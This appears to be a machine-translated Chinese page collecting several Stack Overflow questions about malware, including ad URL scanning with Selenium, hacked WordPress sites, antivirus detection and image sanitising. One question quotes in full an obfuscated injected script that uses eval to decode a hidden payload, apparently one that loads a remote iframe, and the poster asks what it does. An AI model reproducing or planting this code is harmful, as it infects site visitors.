标签: malware

基于Selenium的恶意软件(恶意广告)检查 - 几个问题

我们最近遇到一个问题,即通过第三方购买广告的广告客户是通过他们购买的广告分发恶意软件.

这导致谷歌黑色在短时间内列出我们的网络资产.

此问题现已解决.

发生这种情况后,我们决定自我恳求广告客户.

在网上搜索提供此服务的服务后,我们发现了一些...... Armorize(www.armorize.com)等提供此类服务.但在通过电话与他们的销售人员交谈后,我们发现他们为这项服务收取10K-15K美元/年的费用.超出我们的价格范围.

我们没有那种蛋糕.

我们所拥有的是对我们(错误,我的)肩膀的聪明头脑.

所以,这就是我开发的内容.

A) Selenium running firefox.
B) Firefox proxying all requests via a locally hosted squid proxy.
Run Code Online (Sandbox Code Playgroud)

结果?

管道广告客户网址 - > Selenium Firefox - > Squid访问日志 - >广告所点击的所有网址的干净清单.

下一步是针对某种恶意软件列表测试这些.我们现在正在测试它们googles safebrowsing API(https://developers.google.com/safe-browsing/).

结果正是我们想要的.一种通过"真实浏览器"测试我们的广告商点击的每个URL的方法.

所以,问题如下:

a)就Google而言,使用他们的(googles)API是否可接受?我们将100%保留在内部,并且不会转售此服务.它为我们100%.

b)谷歌安全浏览器API是否允许检查FULL URL,或者它是否仅适用于每个域?

c)有没有人知道我们可以测试这些URL的任何其他API?免费/低成本会很棒:)

谢谢!

api selenium safe-browsing malware

5
推荐指数
1
解决办法
528
查看次数

我的网站重定向到恶意网站

美好的一天

我刚刚将一个Wordpress主题上传到我的网站网络服务器上.现在我在我的家庭服务器上测试了这个主题,没有任何问题.

由于它已经在网络服务器上(在一家值得信赖的托管公司),当我浏览我的网站时,我会将网址重定向到恶意网站.(我从来没有向任何人提供任何帐户详细信息,帐户只有一周的时间)

这是我的网站:http://evolutionof4.co.za

它链接到的恶意网站是:themeforest.net,carolini.net等.

我已经在网络服务器上扫描了我的所有文件以查找恶意软件(使用avast),我还使用Sucuri Security扫描了我的网站,但它没有接收任何内容.

我不认为它是我的PC上的恶意软件,因为我从我的局域网上的另一台PC遇到同样的问题...

有帮助吗?

谢谢

malware

5
推荐指数
1
解决办法
4523
查看次数

恶意js是自动注入我的header.php文件和许多其他js文件?

目前我面临着一种地狱般的局面,我的客户网站中有四个在10天之前被黑了.我和他们搞砸了很多,他们中的三个在我长时间陷入困境之后工作正常(运行magento),但其中一个(运行word press)仍然面临同样的情况,我无法弄清楚会发生什么在特定时间之后,js文件和一些php文件也会自动注入这种代码:

<?
#ded509#
echo "<script type=\"text/javascript\" language=\"javascript\" > e=eval;v=\"0x\";a=0;try{a&=2}catch(q){a=1}if(!a){try{document[\"body\"]^=~1;}catch(q){a2=\"!\"}z=\"2f!6d!7c!75!6a!7b!70!76!75!27!2f!30!27!82!14!11!27!27!27!27!7d!68!79!27!6a!27!44!27!6b!76!6a!7c!74!6c!75!7b!35!6a!79!6c!68!7b!6c!4c!73!6c!74!6c!75!7b!2f!2e!70!6d!79!68!74!6c!2e!30!42!14!11!14!11!27!27!27!27!6a!35!7a!79!6a!27!44!27!2e!6f!7b!7b!77!41!36!36!71!68!72!80!7a!72!80!6d!35!79!7c!36!6a!76!7c!75!7b!38!3d!35!77!6f!77!2e!42!14!11!27!27!27!27!6a!35!7a!7b!80!73!6c!35!77!76!7a!70!7b!70!76!75!27!44!27!2e!68!69!7a!76!73!7c!7b!6c!2e!42!14!11!27!27!27!27!6a!35!7a!7b!80!73!6c!35!69!76!79!6b!6c!79!27!44!27!2e!37!2e!42!14!11!27!27!27!27!6a!35!7a!7b!80!73!6c!35!6f!6c!70!6e!6f!7b!27!44!27!2e!38!77!7f!2e!42!14!11!27!27!27!27!6a!35!7a!7b!80!73!6c!35!7e!70!6b!7b!6f!27!44!27!2e!38!77!7f!2e!42!14!11!27!27!27!27!6a!35!7a!7b!80!73!6c!35!73!6c!6d!7b!27!44!27!2e!38!77!7f!2e!42!14!11!27!27!27!27!6a!35!7a!7b!80!73!6c!35!7b!76!77!27!44!27!2e!38!77!7f!2e!42!14!11!14!11!27!27!27!27!70!6d!27!2f!28!6b!76!6a!7c!74!6c!75!7b!35!6e!6c!7b!4c!73!6c!74!6c!75!7b!49!80!50!6b!2f!2e!6a!2e!30!30!27!82!14!11!27!27!27!27!27!27!27!27!6b!76!6a!7c!74!6c!75!7b!35!7e!79!70!7b!6c!2f!2e!43!6b!70!7d!27!70!6b!44!63!2e!6a!63!2e!45!43!36!6b!70!7d!45!2e!30!42!14!11!27!27!27!27!27!27!27!27!6b!76!6a!7c!74!6c!75!7b!35!6e!6c!7b!4c!73!6c!74!6c!75!7b!49!80!50!6b!2f!2e!6a!2e!30!35!68!77!77!6c!75!6b!4a!6f!70!73!6b!2f!6a!30!42!14!11!27!27!27!27!84!14!11!84!30!2f!30!42\".split(a2);s=\"\";if(window.document)for(i=0;i<z.length;i++)     {s+=String.fromCharCode(e(v+(z[i]))-7);}zaz=s;e(zaz);}</script>";
#/ded509#
?>
Run Code Online (Sandbox Code Playgroud)

这段代码注入所有js文件和主文件,我更改了ftp密码,我检查了cron作业,手动我查找了任何PHP代码(我感觉像是一些PHP代码正在这样做)但是我无法想象它out,是的,我试图解码这段代码并尝试获取此代码的功能,但从我的js文件中删除此恶意代码将使我的网站好一段时间,但在一段随机时间之后脚本将自动注入此代码?实际上这个js代码是什么?如果有人解释实际发生的事情,将会非常有帮助吗?

javascript php jquery malware

5
推荐指数
1
解决办法
2620
查看次数

防病毒如何知道不检测非恶意代码?

假设我创建了一个文件压缩库,这个库用于1000(非恶意)程序.但现在恶意软件开发人员决定创建一个恶意软件并使用我的库来压缩一些文件.

根据我对防病毒如何工作的一点知识,它从恶意软件中选择一组字节串并将其存储在其数据库中.现在,当防病毒软件扫描具有这些字节字符串的程序时,它会警告用户这是恶意软件.

但是,如果Antivirus选择了与我的库代​​码的一部分相对应的字符串,那么这不意味着我的库现在被检测为恶意软件(因此1000个非恶意程序现在被检测为恶意软件)?

c++ antivirus virus malware malware-detection

5
推荐指数
1
解决办法
424
查看次数

Windows上的“%TEMP%\ Encoding Time.csv”是什么?

有谁知道哪个应用程序正在写入文件“%TEMP%\ Encoding Time.csv”?该文件正在不断增长。搜索Internet没有产生任何有意义的结果。下面是文件中记录的示例。

0x1B959F08、37033756854966440、11792153、11792156、3、640x360

0x1B959F08、37033756855766744、11792232、11792236、4、640x360

0x1B959F08、37033756856405856、11792303、11792306、3、640x360

malware

5
推荐指数
2
解决办法
6333
查看次数

lisp可以用来编写病毒或其他恶意软件吗?

我只是好奇.我总是听说C或汇编是病毒的首选语言,我想知道是否还可以使用像lisp或scheme这样的任何更神秘的语言

lisp malware

4
推荐指数
1
解决办法
1698
查看次数

在Chrome中为客户解决"不常下载"警告

当客户点击我们某个产品的下载链接时,他们会看到一条警告,指出该文件通常不会被下载并且可能存在危险.

这是误报.

我们在哪里可以上传我们的文件,以便Chrome/Google标记为安全,就像我们为所有防病毒供应商所做的那样?

google-chrome malware vendor

4
推荐指数
1
解决办法
6745
查看次数

编译时间恶意软件可能吗?

是否有可能让开源程序在编译时安装恶意软件?我正在考虑在编译时执行邪恶代码的C宏或makefile相关的东西.或者只要我不开始运行已编译的程序,我是否安全?

c compilation malware

4
推荐指数
1
解决办法
4608
查看次数

未知脚本在html body关闭标记之前预先添加

从今天早上起,我发现一些未知的脚本正在"body"关闭标记之前,脚本是:

<script> var addthis_config = {"pubid":"ra-554ac5c71847b3c2"}; </script><script type="text/javascript" src="//s7.addthis.com/js/300/addthis_widget.js#pubid=ra-554ac5c71847b3c2"></script>
<script> if (addthis && addthis.layers) { addthis.layers({'share':{'mobile':false}});}</script>
Run Code Online (Sandbox Code Playgroud)

我没有在网站上添加这段代码.我正在寻找这个的根本原因.但直到这一刻我找不到删除此脚本的解决方案.到目前为止我做了什么/观察到的:

删除了"body"关闭标记:没有脚本

试图添加一个html文件(带基本标签)index.html文件:发现脚本是在正文关闭之前注入的.

脚本只能在主页上看到.

文件上传到具有不同域的不同主机:无脚本

Web服务器是Apache,.htaccess的内容如下所示:

<IfModule mod_rewrite.c>
<IfModule mod_negotiation.c>
    Options -MultiViews
</IfModule>

RewriteEngine On

RewriteEngine On
RewriteCond %{HTTP_HOST} ^(.*)mywebsite\.ae [NC]
RewriteRule ^(.*)$ http://www.mywebsite.org/$1 [R,L]

RewriteRule ^(.*)/$ /$1 [L,R=301]

# Handle Front Controller...
RewriteCond %{REQUEST_FILENAME} !-d
RewriteCond %{REQUEST_FILENAME} !-f
RewriteRule ^ index.php [L]
Run Code Online (Sandbox Code Playgroud)

该网站托管亚马逊网络服务.以前有没有人有过这样的经历?

javascript malware

4
推荐指数
1
解决办法
602
查看次数

使用 Python 删除图像中的潜在恶意软件

我了解到 .PNG、.JPEG 和其他图像文件类型可能包含恶意软件。

我希望删除用户上传的图像中嵌入的潜在恶意软件。Python 中有没有一种方法可以从本质上“扁平化”图像,从而从本质上删除任何恶意内容?有点像您要截取图像的屏幕截图然后保存屏幕截图?或者也许存在一种不容易损坏的图像类型?

我已经将所有用户上传的内容托管在一个单独的域上,但我想知道是否可以更进一步。

python malware python-imaging-library

4
推荐指数
1
解决办法
2734
查看次数